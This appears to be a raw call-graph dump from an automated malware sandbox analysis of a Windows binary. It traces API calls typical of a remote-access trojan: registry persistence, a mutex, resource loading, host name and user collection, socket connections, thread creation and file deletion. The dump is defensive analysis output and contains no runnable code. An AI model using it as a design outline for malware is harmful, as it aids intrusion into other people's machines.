2fc4cb6 IsProcessorFeaturePresent 47014->47319 47016 2fc463c 47320 2fc8fb1 10 API calls 4 library calls 47016->47320 47018 2fc4641 47019 2fc4645 47018->47019 47321 2fd415f 47018->47321 47019->46989 47022 2fc465c 47022->46989 47337 2fc6f10 47024->47337 47027 2fc49f9 47028 2fd4223 47027->47028 47339 2fdf0d9 47028->47339 47030 2fc4a02 47033 2f9ea00 47030->47033 47032 2fd422c 47032->47030 47343 2fd6895 35 API calls 47032->47343 47438 2facbe1 LoadLibraryA GetProcAddress 47033->47438 47035 2f9ea1c GetModuleFileNameW 47443 2f9f3fe 47035->47443 47037 2f9ea38 47458 2f920f6 47037->47458 47040 2f920f6 28 API calls 47041 2f9ea56 47040->47041 47464 2fabeac 47041->47464 47045 2f9ea68 47490 2f91e8d 47045->47490 47047 2f9ea71 47048 2f9eace 47047->47048 47049 2f9ea84 47047->47049 47496 2f91e65 47048->47496 47764 2f9fbee 116 API calls 47049->47764 47052 2f9eade 47056 2f91e65 22 API calls 47052->47056 47053 2f9ea96 47054 2f91e65 22 API calls 47053->47054 47055 2f9eaa2 47054->47055 47765 2fa0f72 36 API calls __EH_prolog 47055->47765 47057 2f9eafd 47056->47057 47501 2f9531e 47057->47501 47060 2f9eab4 47766 2f9fb9f 77 API calls 47060->47766 47061 2f9eb0c 47506 2f96383 47061->47506 47065 2f9eabd 47767 2f9f3eb 70 API calls 47065->47767 47069 2f9eac6 47072 2f91fd8 11 API calls 47069->47072 47074 2f9ef36 47072->47074 47073 2f91fd8 11 API calls 47075 2f9eb36 47073->47075 47315 2fd3396 GetModuleHandleW 47074->47315 47076 2f91e65 22 API calls 47075->47076 47077 2f9eb3f 47076->47077 47523 2f91fc0 47077->47523 47079 2f9eb4a 47080 2f91e65 22 API calls 47079->47080 47081 2f9eb63 47080->47081 47082 2f91e65 22 API calls 47081->47082 47084 2f9eb7e 47082->47084 47083 2f9ebe9 47085 2f91e65 22 API calls 47083->47085 47084->47083 47768 2f96c59 47084->47768 47087 2f9ebf6 47085->47087 47095 2fa3584 3 API calls 47087->47095 47107 2f9ec3d 47087->47107 47088 2f9ebab 47089 2f91fe2 28 API calls 47088->47089 47090 2f9ebb7 47089->47090 47091 2f91fd8 11 API calls 47090->47091 47093 2f9ebc0 47091->47093 47773 2fa3584 RegOpenKeyExA 47093->47773 47094 2f9ec43 47094->47069 47530 2fab354 47094->47530 47101 2f9ec21 47095->47101 47099 2f9f38a 47856 2fa39e4 30 API calls 47099->47856 47100 2f9ec5e 47102 2f9ecb1 47100->47102 47547 2f97751 47100->47547 47101->47107 47776 2fa39e4 30 API calls 47101->47776 47105 2f91e65 22 API calls 47102->47105 47108 2f9ecba 47105->47108 47527 2f9d0a4 47107->47527 47117 2f9eccb 47108->47117 47118 2f9ecc6 47108->47118 47110 2f9f3a0 47857 2fa24b0 65 API calls ___scrt_get_show_window_mode 47110->47857 47111 2f9ec7d 47777 2f97773 30 API calls 47111->47777 47112 2f9ec87 47115 2f91e65 22 API calls 47112->47115 47127 2f9ec90 47115->47127 47116 2f9f3aa 47120 2fabcef 28 API calls 47116->47120 47123 2f91e65 22 API calls 47117->47123 47780 2f97790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47118->47780 47119 2f9ec82 47778 2f9729b 97 API calls 47119->47778 47124 2f9f3ba 47120->47124 47125 2f9ecd4 47123->47125 47656 2fa3a5e RegOpenKeyExW 47124->47656 47551 2fabcef 47125->47551 47127->47102 47131 2f9ecac 47127->47131 47128 2f9ecdf 47555 2f91f13 47128->47555 47779 2f9729b 97 API calls 47131->47779 47135 2f91f09 11 API calls 47137 2f9f3d7 47135->47137 47138 2f91f09 11 API calls 47137->47138 47140 2f9f3e0 47138->47140 47659 2f9dd7d 47140->47659 47141 2f91e65 22 API calls 47143 2f9ecfc 47141->47143 47146 2f91e65 22 API calls 47143->47146 47148 2f9ed16 47146->47148 47147 2f9f3ea 47149 2f91e65 22 API calls 47148->47149 47150 2f9ed30 47149->47150 47151 2f91e65 22 API calls 47150->47151 47153 2f9ed49 47151->47153 47152 2f9edb6 47154 2f9edc5 47152->47154 47161 2f9ef41 ___scrt_get_show_window_mode 47152->47161 47153->47152 47155 2f91e65 22 API calls 47153->47155 47156 2f9edce 47154->47156 47184 2f9ee4a ___scrt_get_show_window_mode 47154->47184 47159 2f9ed5e _wcslen 47155->47159 47157 2f91e65 22 API calls 47156->47157 47158 2f9edd7 47157->47158 47160 2f91e65 22 API calls 47158->47160 47159->47152 47162 2f91e65 22 API calls 47159->47162 47163 2f9ede9 47160->47163 47841 2fa3733 RegOpenKeyExA 47161->47841 47164 2f9ed79 47162->47164 47166 2f91e65 22 API calls 47163->47166 47168 2f91e65 22 API calls 47164->47168 47167 2f9edfb 47166->47167 47171 2f91e65 22 API calls 47167->47171 47169 2f9ed8e 47168->47169 47781 2f9da6f 47169->47781 47170 2f9ef8c 47172 2f91e65 22 API calls 47170->47172 47173 2f9ee24 47171->47173 47174 2f9efb1 47172->47174 47179 2f91e65 22 API calls 47173->47179 47577 2f92093 47174->47577 47177 2f91f13 28 API calls 47178 2f9edad 47177->47178 47181 2f91f09 11 API calls 47178->47181 47182 2f9ee35 47179->47182 47181->47152 47839 2f9ce34 45 API calls _wcslen 47182->47839 47183 2f9efc3 47583 2fa37aa RegCreateKeyA 47183->47583 47567 2fa3982 47184->47567 47189 2f9eede ctype 47193 2f91e65 22 API calls 47189->47193 47190 2f9ee45 47190->47184 47191 2f91e65 22 API calls 47192 2f9efe5 47191->47192 47589 2fcbb2c 47192->47589 47194 2f9eef5 47193->47194 47194->47170 47198 2f9ef09 47194->47198 47197 2f9effc 47844 2face2c 86 API calls ___scrt_get_show_window_mode 47197->47844 47200 2f91e65 22 API calls 47198->47200 47199 2f9f01f 47205 2f92093 28 API calls 47199->47205 47202 2f9ef12 47200->47202 47203 2fabcef 28 API calls 47202->47203 47207 2f9ef1e 47203->47207 47204 2f9f003 CreateThread 47204->47199 48757 2fad4ee 10 API calls 47204->48757 47206 2f9f034 47205->47206 47208 2f92093 28 API calls 47206->47208 47840 2f9f4af 103 API calls 47207->47840 47210 2f9f043 47208->47210 47593 2fab580 47210->47593 47211 2f9ef23 47211->47170 47213 2f9ef2a 47211->47213 47213->47069 47215 2f91e65 22 API calls 47216 2f9f054 47215->47216 47217 2f91e65 22 API calls 47216->47217 47218 2f9f066 47217->47218 47219 2f91e65 22 API calls 47218->47219 47220 2f9f086 47219->47220 47221 2fcbb2c 39 API calls 47220->47221 47222 2f9f093 47221->47222 47223 2f91e65 22 API calls 47222->47223 47224 2f9f09e 47223->47224 47225 2f91e65 22 API calls 47224->47225 47226 2f9f0af 47225->47226 47227 2f91e65 22 API calls 47226->47227 47228 2f9f0c4 47227->47228 47229 2f91e65 22 API calls 47228->47229 47230 2f9f0d5 47229->47230 47231 2f9f0dc StrToIntA 47230->47231 47617 2f99e1f 47231->47617 47234 2f91e65 22 API calls 47235 2f9f0f7 47234->47235 47236 2f9f13c 47235->47236 47237 2f9f103 47235->47237 47239 2f91e65 22 API calls 47236->47239 47845 2fc455e 47237->47845 47241 2f9f14c 47239->47241 47244 2f9f158 47241->47244 47245 2f9f194 47241->47245 47242 2f91e65 22 API calls 47243 2f9f11f 47242->47243 47246 2f9f126 CreateThread 47243->47246 47247 2fc455e new 22 API calls 47244->47247 47248 2f91e65 22 API calls 47245->47248 47246->47236 48760 2faa045 102 API calls __EH_prolog 47246->48760 47249 2f9f161 47247->47249 47250 2f9f19d 47248->47250 47251 2f91e65 22 API calls 47249->47251 47253 2f9f1a9 47250->47253 47254 2f9f207 47250->47254 47252 2f9f173 47251->47252 47257 2f9f17a CreateThread 47252->47257 47256 2f91e65 22 API calls 47253->47256 47255 2f91e65 22 API calls 47254->47255 47258 2f9f210 47255->47258 47259 2f9f1b9 47256->47259 47257->47245 48759 2faa045 102 API calls __EH_prolog 47257->48759 47260 2f9f21c 47258->47260 47261 2f9f255 47258->47261 47262 2f91e65 22 API calls 47259->47262 47264 2f91e65 22 API calls 47260->47264 47642 2fab69e GetComputerNameExW GetUserNameW 47261->47642 47265 2f9f1ce 47262->47265 47267 2f9f225 47264->47267 47852 2f9da23 31 API calls 47265->47852 47272 2f91e65 22 API calls 47267->47272 47268 2f91f13 28 API calls 47269 2f9f269 47268->47269 47271 2f91f09 11 API calls 47269->47271 47274 2f9f272 47271->47274 47275 2f9f23a 47272->47275 47273 2f9f1e1 47276 2f91f13 28 API calls 47273->47276 47277 2f9f27b SetProcessDEPPolicy 47274->47277 47278 2f9f27e CreateThread 47274->47278 47286 2fcbb2c 39 API calls 47275->47286 47279 2f9f1ed 47276->47279 47277->47278 47280 2f9f29f 47278->47280 47281 2f9f293 CreateThread 47278->47281 48728 2f9f7e2 47278->48728 47282 2f91f09 11 API calls 47279->47282 47284 2f9f2a8 CreateThread 47280->47284 47285 2f9f2b4 47280->47285 47281->47280 48755 2fa2132 137 API calls 47281->48755 47283 2f9f1f6 CreateThread 47282->47283 47283->47254 48756 2f91be9 49 API calls 47283->48756 47284->47285 48758 2fa2716 38 API calls ___scrt_get_show_window_mode 47284->48758 47288 2f9f307 47285->47288 47290 2f92093 28 API calls 47285->47290 47287 2f9f247 47286->47287 47853 2f9c19d 7 API calls 47287->47853 47653 2fa353a RegOpenKeyExA 47288->47653 47291 2f9f2d7 47290->47291 47854 2f952fd 28 API calls 47291->47854 47296 2f9f328 47298 2fabcef 28 API calls 47296->47298 47300 2f9f338 47298->47300 47855 2fa3656 31 API calls 47300->47855 47305 2f9f34e 47306 2f91f09 11 API calls 47305->47306 47309 2f9f359 47306->47309 47307 2f9f381 DeleteFileW 47308 2f9f388 47307->47308 47307->47309 47308->47116 47309->47116 47309->47307 47310 2f9f36f Sleep 47309->47310 47310->47309 47311->46989 47312->46993 47313->46996 47314->47003 47315->47006 47316->47007 47317->47009 47318->47012 47319->47016 47320->47018 47325 2fdfbe8 47321->47325 47324 2fc8fda 8 API calls 3 library calls 47324->47019 47328 2fdfc01 47325->47328 47327 2fc464e 47327->47022 47327->47324 47329 2fc502b 47328->47329 47330 2fc5034 47329->47330 47331 2fc5036 IsProcessorFeaturePresent 47329->47331 47330->47327 47333 2fc5078 47331->47333 47336 2fc503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47333->47336 47335 2fc515b 47335->47327 47336->47335 47338 2fc4bb8 GetStartupInfoW 47337->47338 47338->47027 47340 2fdf0eb 47339->47340 47341 2fdf0e2 47339->47341 47340->47032 47344 2fdefd8 47341->47344 47343->47032 47364 2fd8295 GetLastError 47344->47364 47346 2fdefe5 47385 2fdf0f7 47346->47385 47348 2fdefed 47394 2fded6c 47348->47394 47351 2fdf004 47351->47340 47354 2fdf047 47410 2fd6802 47354->47410 47357 2fdf03a 47358 2fdf042 47357->47358 47361 2fdf05f 47357->47361 47409 2fd062d 20 API calls __dosmaperr 47358->47409 47360 2fdf08b 47360->47354 47416 2fdec42 20 API calls 47360->47416 47361->47360 47362 2fd6802 _free 20 API calls 47361->47362 47362->47360 47365 2fd82ab 47364->47365 47366 2fd82b7 47364->47366 47417 2fd883c 11 API calls 2 library calls 47365->47417 47418 2fd5b74 20 API calls 3 library calls 47366->47418 47369 2fd82b1 47369->47366 47372 2fd8300 SetLastError 47369->47372 47370 2fd82c3 47371 2fd82cb 47370->47371 47419 2fd8892 11 API calls 2 library calls 47370->47419 47374 2fd6802 _free 20 API calls 47371->47374 47372->47346 47376 2fd82d1 47374->47376 47375 2fd82e0 47375->47371 47377 2fd82e7 47375->47377 47378 2fd830c SetLastError 47376->47378 47420 2fd8107 20 API calls _GetRangeOfTrysToCheck 47377->47420 47421 2fd6175 35 API calls _Atexit 47378->47421 47380 2fd82f2 47383 2fd6802 _free 20 API calls 47380->47383 47384 2fd82f9 47383->47384 47384->47372 47384->47378 47386 2fdf103 ___BuildCatchObject 47385->47386 47387 2fd8295 _GetRangeOfTrysToCheck 35 API calls 47386->47387 47392 2fdf10d 47387->47392 47389 2fdf191 ___BuildCatchObject 47389->47348 47392->47389 47393 2fd6802 _free 20 API calls 47392->47393 47422 2fd6175 35 API calls _Atexit 47392->47422 47423 2fd5909 EnterCriticalSection 47392->47423 47424 2fdf188 LeaveCriticalSection std::_Lockit::~_Lockit 47392->47424 47393->47392 47425 2fca837 47394->47425 47397 2fded8d GetOEMCP 47399 2fdedb6 47397->47399 47398 2fded9f 47398->47399 47400 2fdeda4 GetACP 47398->47400 47399->47351 47401 2fd61b8 47399->47401 47400->47399 47402 2fd61f6 47401->47402 47406 2fd61c6 ___crtLCMapStringA 47401->47406 47436 2fd062d 20 API calls __dosmaperr 47402->47436 47403 2fd61e1 RtlAllocateHeap 47405 2fd61f4 47403->47405 47403->47406 47405->47354 47408 2fdf199 48 API calls 2 library calls 47405->47408 47406->47402 47406->47403 47435 2fd3001 7 API calls 2 library calls 47406->47435 47408->47357 47409->47354 47411 2fd680d RtlFreeHeap 47410->47411 47412 2fd6836 __dosmaperr 47410->47412 47411->47412 47413 2fd6822 47411->47413 47412->47351 47437 2fd062d 20 API calls __dosmaperr 47413->47437 47415 2fd6828 GetLastError 47415->47412 47416->47354 47417->47369 47418->47370 47419->47375 47420->47380 47423->47392 47424->47392 47426 2fca854 47425->47426 47432 2fca84a 47425->47432 47427 2fd8295 _GetRangeOfTrysToCheck 35 API calls 47426->47427 47426->47432 47428 2fca875 47427->47428 47433 2fd83e4 35 API calls __Toupper 47428->47433 47430 2fca88e 47434 2fd8411 35 API calls __cftof 47430->47434 47432->47397 47432->47398 47433->47430 47434->47432 47435->47406 47436->47405 47437->47415 47439 2facc20 LoadLibraryA GetProcAddress 47438->47439 47440 2facc10 GetModuleHandleA GetProcAddress 47438->47440 47441 2facc49 44 API calls 47439->47441 47442 2facc39 LoadLibraryA GetProcAddress 47439->47442 47440->47439 47441->47035 47442->47441 47858 2fab539 FindResourceA 47443->47858 47447 2f9f428 _Yarn 47868 2f920b7 47447->47868 47450 2f91fe2 28 API calls 47451 2f9f44e 47450->47451 47452 2f91fd8 11 API calls 47451->47452 47453 2f9f457 47452->47453 47454 2fcbda0 _Yarn 21 API calls 47453->47454 47455 2f9f468 _Yarn 47454->47455 47874 2f96e13 47455->47874 47457 2f9f49b 47457->47037 47459 2f9210c 47458->47459 47460 2f923ce 11 API calls 47459->47460 47461 2f92126 47460->47461 47462 2f92569 28 API calls 47461->47462 47463 2f92134 47462->47463 47463->47040 47911 2f920df 47464->47911 47466 2fabebf 47469 2fabf31 47466->47469 47478 2f91fe2 28 API calls 47466->47478 47481 2f91fd8 11 API calls 47466->47481 47485 2fabf2f 47466->47485 47915 2f941a2 47466->47915 47918 2facec5 47466->47918 47467 2f91fd8 11 API calls 47468 2fabf61 47467->47468 47470 2f91fd8 11 API calls 47468->47470 47471 2f941a2 28 API calls 47469->47471 47473 2fabf69 47470->47473 47475 2fabf3d 47471->47475 47474 2f91fd8 11 API calls 47473->47474 47476 2f9ea5f 47474->47476 47477 2f91fe2 28 API calls 47475->47477 47486 2f9fb52 47476->47486 47479 2fabf46 47477->47479 47478->47466 47480 2f91fd8 11 API calls 47479->47480 47482 2fabf4e 47480->47482 47481->47466 47483 2facec5 28 API calls 47482->47483 47483->47485 47485->47467 47487 2f9fb5e 47486->47487 47489 2f9fb65 47486->47489 47960 2f92163 11 API calls 47487->47960 47489->47045 47492 2f92163 47490->47492 47491 2f9219f 47491->47047 47492->47491 47961 2f92730 11 API calls 47492->47961 47494 2f92184 47962 2f92712 11 API calls std::_Deallocate 47494->47962 47497 2f91e6d 47496->47497 47498 2f91e75 47497->47498 47963 2f92158 22 API calls 47497->47963 47498->47052 47502 2f920df 11 API calls 47501->47502 47503 2f9532a 47502->47503 47964 2f932a0 47503->47964 47505 2f95346 47505->47061 47969 2f951ef 47506->47969 47508 2f96391 47973 2f92055 47508->47973 47511 2f91fe2 47512 2f91ff1 47511->47512 47519 2f92039 47511->47519 47513 2f923ce 11 API calls 47512->47513 47514 2f91ffa 47513->47514 47515 2f9203c 47514->47515 47517 2f92015 47514->47517 47516 2f9267a 11 API calls 47515->47516 47516->47519 48007 2f93098 28 API calls 47517->48007 47520 2f91fd8 47519->47520 47521 2f923ce 11 API calls 47520->47521 47522 2f91fe1 47521->47522 47522->47073 47524 2f91fc9 47523->47524 47525 2f91fd2 47523->47525 48008 2f925e0 28 API calls 47524->48008 47525->47079 48009 2f91fab 47527->48009 47529 2f9d0ae CreateMutexA GetLastError 47529->47094 48010 2fac048 47530->48010 47535 2f91fe2 28 API calls 47536 2fab390 47535->47536 47537 2f91fd8 11 API calls 47536->47537 47538 2fab398 47537->47538 47539 2fa35e1 31 API calls 47538->47539 47541 2fab3ee 47538->47541 47540 2fab3c1 47539->47540 47542 2fab3cc StrToIntA 47540->47542 47541->47100 47543 2fab3da 47542->47543 47544 2fab3e3 47542->47544 48018 2facffa 22 API calls 47543->48018 47546 2f91fd8 11 API calls 47544->47546 47546->47541 47548 2f97765 47547->47548 47549 2fa3584 3 API calls 47548->47549 47550 2f9776c 47549->47550 47550->47111 47550->47112 47552 2fabd03 47551->47552 48019 2f9b93f 47552->48019 47554 2fabd0b 47554->47128 47556 2f91f22 47555->47556 47563 2f91f6a 47555->47563 47557 2f92252 11 API calls 47556->47557 47558 2f91f2b 47557->47558 47559 2f91f6d 47558->47559 47561 2f91f46 47558->47561 48052 2f92336 47559->48052 48051 2f9305c 28 API calls 47561->48051 47564 2f91f09 47563->47564 47565 2f92252 11 API calls 47564->47565 47566 2f91f12 47565->47566 47566->47141 47568 2fa39a0 47567->47568 47569 2f96e13 28 API calls 47568->47569 47570 2fa39b5 47569->47570 47571 2f920f6 28 API calls 47570->47571 47572 2fa39c5 47571->47572 47573 2fa37aa 14 API calls 47572->47573 47574 2fa39cf 47573->47574 47575 2f91fd8 11 API calls 47574->47575 47576 2fa39dc 47575->47576 47576->47189 47578 2f9209b 47577->47578 47579 2f923ce 11 API calls 47578->47579 47580 2f920a6 47579->47580 48056 2f924ed 47580->48056 47584 2fa37fa 47583->47584 47585 2fa37c3 47583->47585 47586 2f91fd8 11 API calls 47584->47586 47588 2fa37d5 RegSetValueExA RegCloseKey 47585->47588 47587 2f9efd9 47586->47587 47587->47191 47588->47584 47590 2fcbb45 _swprintf 47589->47590 48060 2fcae83 47590->48060 47592 2f9eff2 47592->47197 47592->47199 47594 2fab631 47593->47594 47595 2fab596 GetLocalTime 47593->47595 47596 2f91fd8 11 API calls 47594->47596 47597 2f9531e 28 API calls 47595->47597 47598 2fab639 47596->47598 47599 2fab5d8 47597->47599 47601 2f91fd8 11 API calls 47598->47601 47600 2f96383 28 API calls 47599->47600 47602 2fab5e4 47600->47602 47603 2f9f048 47601->47603 48087 2f92f10 47602->48087 47603->47215 47606 2f96383 28 API calls 47607 2fab5fc 47606->47607 48092 2f9723b 76 API calls 47607->48092 47609 2fab60a 47610 2f91fd8 11 API calls 47609->47610 47611 2fab616 47610->47611 47612 2f91fd8 11 API calls 47611->47612 47613 2fab61f 47612->47613 47614 2f91fd8 11 API calls 47613->47614 47615 2fab628 47614->47615 47616 2f91fd8 11 API calls 47615->47616 47616->47594 47618 2f99e3d _wcslen 47617->47618 47619 2f99e48 47618->47619 47620 2f99e5f 47618->47620 47621 2f9da6f 31 API calls 47619->47621 47622 2f9da6f 31 API calls 47620->47622 47623 2f99e50 47621->47623 47624 2f99e67 47622->47624 47625 2f91f13 28 API calls 47623->47625 47626 2f91f13 28 API calls 47624->47626 47641 2f99e5a 47625->47641 47627 2f99e75 47626->47627 47628 2f91f09 11 API calls 47627->47628 47630 2f99e7d 47628->47630 47629 2f91f09 11 API calls 47631 2f99eb4 47629->47631 48111 2f99196 28 API calls 47630->48111 48096 2f9a144 47631->48096 47633 2f99e8f 48112 2f93014 47633->48112 47638 2f91f13 28 API calls 47639 2f99ea4 47638->47639 47640 2f91f09 11 API calls 47639->47640 47640->47641 47641->47629 48316 2f9417e 47642->48316 47647 2f93014 28 API calls 47648 2fab703 47647->47648 47649 2f91f09 11 API calls 47648->47649 47650 2fab70c 47649->47650 47651 2f91f09 11 API calls 47650->47651 47652 2f9f25e 47651->47652 47652->47268 47654 2fa355b RegQueryValueExA RegCloseKey 47653->47654 47655 2f9f31f 47653->47655 47654->47655 47655->47140 47655->47296 47657 2fa3a7a RegDeleteValueW 47656->47657 47658 2f9f3cd 47656->47658 47657->47658 47658->47135 47660 2f9dd96 47659->47660 47661 2fa353a 3 API calls 47660->47661 47662 2f9dd9d 47661->47662 47666 2f9ddbc 47662->47666 48410 2f91707 47662->48410 47664 2f9ddaa 48413 2fa38b2 RegCreateKeyA 47664->48413 47667 2fa4f65 47666->47667 47668 2f920df 11 API calls 47667->47668 47669 2fa4f79 47668->47669 48427 2fab944 47669->48427 47672 2f920df 11 API calls 47673 2fa4f8f 47672->47673 47674 2f91e65 22 API calls 47673->47674 47675 2fa4f9d 47674->47675 47676 2fcbb2c 39 API calls 47675->47676 47677 2fa4faa 47676->47677 47678 2fa4faf Sleep 47677->47678 47679 2fa4fbc 47677->47679 47678->47679 47680 2f92093 28 API calls 47679->47680 47681 2fa4fcb 47680->47681 47682 2f91e65 22 API calls 47681->47682 47683 2fa4fd4 47682->47683 47684 2f920f6 28 API calls 47683->47684 47685 2fa4fdf 47684->47685 47686 2fabeac 28 API calls 47685->47686 47687 2fa4fe7 47686->47687 48431 2f9489e WSAStartup 47687->48431 47689 2fa4ff1 47690 2f91e65 22 API calls 47689->47690 47691 2fa4ffa 47690->47691 47692 2f91e65 22 API calls 47691->47692 47739 2fa5079 47691->47739 47693 2fa5013 47692->47693 47694 2f91e65 22 API calls 47693->47694 47696 2fa5024 47694->47696 47695 2f920f6 28 API calls 47695->47739 47698 2f91e65 22 API calls 47696->47698 47697 2fabeac 28 API calls 47697->47739 47699 2fa5035 47698->47699 47701 2f91e65 22 API calls 47699->47701 47700 2f96c59 28 API calls 47700->47739 47702 2fa5046 47701->47702 47703 2f91e65 22 API calls 47702->47703 47705 2fa5057 47703->47705 47704 2f91fe2 28 API calls 47704->47739 47706 2f91e65 22 API calls 47705->47706 47707 2fa5069 47706->47707 48568 2f9473d 88 API calls 47707->48568 47710 2fa51c7 WSAGetLastError 48569 2facb72 30 API calls 47710->48569 47715 2fa51d7 47720 2f91e65 22 API calls 47715->47720 47721 2f91e8d 11 API calls 47715->47721 47722 2fcbb2c 39 API calls 47715->47722 47715->47739 47759 2f92093 28 API calls 47715->47759 47760 2fab580 79 API calls 47715->47760 47761 2fa5aac CreateThread 47715->47761 47762 2f91fd8 11 API calls 47715->47762 47763 2f91f09 11 API calls 47715->47763 48570 2f952fd 28 API calls 47715->48570 48572 2f9b08c 84 API calls 47715->48572 48573 2f94e26 98 API calls 47715->48573 47718 2f91e65 22 API calls 47718->47739 47719 2f9531e 28 API calls 47719->47739 47720->47715 47721->47715 47724 2fa5b0a Sleep 47722->47724 47723 2f96383 28 API calls 47723->47739 47724->47715 47725 2f92f10 28 API calls 47725->47739 47726 2f92093 28 API calls 47726->47739 47727 2fab580 79 API calls 47727->47739 47728 2f91fd8 11 API calls 47728->47739 47731 2f99097 28 API calls 47731->47739 47732 2fd1ed1 20 API calls 47732->47739 47733 2fa3733 3 API calls 47733->47739 47734 2fa35e1 31 API calls 47734->47739 47735 2f9417e 28 API calls 47735->47739 47739->47695 47739->47697 47739->47700 47739->47704 47739->47710 47739->47715 47739->47718 47739->47719 47739->47723 47739->47725 47739->47726 47739->47727 47739->47728 47739->47731 47739->47732 47739->47733 47739->47734 47739->47735 47740 2fabc1f 28 API calls 47739->47740 47741 2f91e65 22 API calls 47739->47741 48432 2fa4f24 47739->48432 48437 2f9482d 47739->48437 48444 2f94f51 47739->48444 48459 2f948c8 connect 47739->48459 48519 2fab871 47739->48519 48522 2fa45f8 47739->48522 48525 2f9ddc4 47739->48525 48531 2fabcd3 47739->48531 48534 2fabdaf 47739->48534 47740->47739 47742 2fa5474 GetTickCount 47741->47742 47743 2fabc1f 28 API calls 47742->47743 47755 2fa5491 47743->47755 47745 2fabc1f 28 API calls 47745->47755 47748 2fabdaf 28 API calls 47748->47755 47750 2f96383 28 API calls 47750->47755 47751 2f92ea1 28 API calls 47751->47755 47752 2f92f10 28 API calls 47752->47755 47754 2f91fd8 11 API calls 47754->47755 47755->47745 47755->47748 47755->47750 47755->47751 47755->47752 47755->47754 47756 2f91f09 11 API calls 47755->47756 48538 2fabb77 47755->48538 48540 2fabb27 47755->48540 48545 2f9f90c GetLocaleInfoA 47755->48545 48548 2f92f31 28 API calls 47755->48548 48549 2f94c10 47755->48549 48571 2f94aa1 60 API calls _Yarn 47755->48571 47756->47755 47759->47715 47760->47715 47761->47715 48718 2faada8 104 API calls 47761->48718 47762->47715 47763->47715 47764->47053 47765->47060 47766->47065 47769 2f920df 11 API calls 47768->47769 47770 2f96c65 47769->47770 47771 2f932a0 28 API calls 47770->47771 47772 2f96c82 47771->47772 47772->47088 47774 2f9ebdf 47773->47774 47775 2fa35ae RegQueryValueExA RegCloseKey 47773->47775 47774->47083 47774->47099 47775->47774 47776->47107 47777->47119 47778->47112 47779->47102 47780->47117 47782 2f91f86 11 API calls 47781->47782 47783 2f9da8b 47782->47783 47784 2f9daab 47783->47784 47785 2f9dae0 47783->47785 47787 2f9daa1 47783->47787 48719 2fab645 29 API calls 47784->48719 47788 2fac048 GetCurrentProcess 47785->47788 47786 2f9dbd4 GetLongPathNameW 47790 2f9417e 28 API calls 47786->47790 47787->47786 47791 2f9dae5 47788->47791 47793 2f9dbe9 47790->47793 47794 2f9dae9 47791->47794 47795 2f9db3b 47791->47795 47792 2f9dab4 47796 2f91f13 28 API calls 47792->47796 47797 2f9417e 28 API calls 47793->47797 47799 2f9417e 28 API calls 47794->47799 47798 2f9417e 28 API calls 47795->47798 47800 2f9dabe 47796->47800 47801 2f9dbf8 47797->47801 47802 2f9db49 47798->47802 47803 2f9daf7 47799->47803 47804 2f91f09 11 API calls 47800->47804 48722 2f9de0c 28 API calls 47801->48722 47808 2f9417e 28 API calls 47802->47808 47809 2f9417e 28 API calls 47803->47809 47804->47787 47806 2f9dc0b 48723 2f92fa5 28 API calls 47806->48723 47811 2f9db5f 47808->47811 47812 2f9db0d 47809->47812 47810 2f9dc16 48724 2f92fa5 28 API calls 47810->48724 48721 2f92fa5 28 API calls 47811->48721 48720 2f92fa5 28 API calls 47812->48720 47816 2f9db18 47820 2f91f13 28 API calls 47816->47820 47817 2f9dc20 47821 2f91f09 11 API calls 47817->47821 47818 2f9db6a 47819 2f91f13 28 API calls 47818->47819 47822 2f9db75 47819->47822 47823 2f9db23 47820->47823 47824 2f9dc2a 47821->47824 47826 2f91f09 11 API calls 47822->47826 47827 2f91f09 11 API calls 47823->47827 47825 2f91f09 11 API calls 47824->47825 47828 2f9dc33 47825->47828 47829 2f9db7e 47826->47829 47830 2f9db2c 47827->47830 47831 2f91f09 11 API calls 47828->47831 47832 2f91f09 11 API calls 47829->47832 47833 2f91f09 11 API calls 47830->47833 47834 2f9dc3c 47831->47834 47832->47800 47833->47800 47835 2f91f09 11 API calls 47834->47835 47836 2f9dc45 47835->47836 47837 2f91f09 11 API calls 47836->47837 47838 2f9dc4e 47837->47838 47838->47177 47839->47190 47840->47211 47842 2fa3759 RegQueryValueExA RegCloseKey 47841->47842 47843 2fa377d 47841->47843 47842->47843 47843->47170 47844->47204 47851 2fc4563 47845->47851 47846 2fcbda0 _Yarn 21 API calls 47846->47851 47847 2f9f10c 47847->47242 47851->47846 47851->47847 48725 2fd3001 7 API calls 2 library calls 47851->48725 48726 2fc4c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47851->48726 48727 2fc52fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47851->48727 47852->47273 47853->47261 47855->47305 47856->47110 47859 2f9f419 47858->47859 47860 2fab556 LoadResource LockResource SizeofResource 47858->47860 47861 2fcbda0 47859->47861 47860->47859 47866 2fd61b8 ___crtLCMapStringA 47861->47866 47862 2fd61f6 47878 2fd062d 20 API calls __dosmaperr 47862->47878 47863 2fd61e1 RtlAllocateHeap 47865 2fd61f4 47863->47865 47863->47866 47865->47447 47866->47862 47866->47863 47877 2fd3001 7 API calls 2 library calls 47866->47877 47869 2f920bf 47868->47869 47879 2f923ce 47869->47879 47871 2f920ca 47883 2f9250a 47871->47883 47873 2f920d9 47873->47450 47875 2f920b7 28 API calls 47874->47875 47876 2f96e27 47875->47876 47876->47457 47877->47866 47878->47865 47880 2f923d8 47879->47880 47881 2f92428 47879->47881 47880->47881 47890 2f927a7 11 API calls std::_Deallocate 47880->47890 47881->47871 47884 2f9251a 47883->47884 47885 2f92520 47884->47885 47886 2f92535 47884->47886 47891 2f92569 47885->47891 47901 2f928e8 28 API calls 47886->47901 47889 2f92533 47889->47873 47890->47881 47902 2f92888 47891->47902 47893 2f9257d 47894 2f92592 47893->47894 47895 2f925a7 47893->47895 47907 2f92a34 22 API calls 47894->47907 47909 2f928e8 28 API calls 47895->47909 47898 2f9259b 47908 2f929da 22 API calls 47898->47908 47900 2f925a5 47900->47889 47901->47889 47903 2f92890 47902->47903 47904 2f92898 47903->47904 47910 2f92ca3 22 API calls 47903->47910 47904->47893 47907->47898 47908->47900 47909->47900 47912 2f920e7 47911->47912 47913 2f923ce 11 API calls 47912->47913 47914 2f920f2 47913->47914 47914->47466 47929 2f9423a 47915->47929 47919 2faced2 47918->47919 47920 2facf31 47919->47920 47926 2facee2 47919->47926 47921 2facf4b 47920->47921 47922 2fad071 28 API calls 47920->47922 47944 2fad1d7 28 API calls 47921->47944 47922->47921 47924 2facf2d 47924->47466 47925 2facf1a 47943 2fad1d7 28 API calls 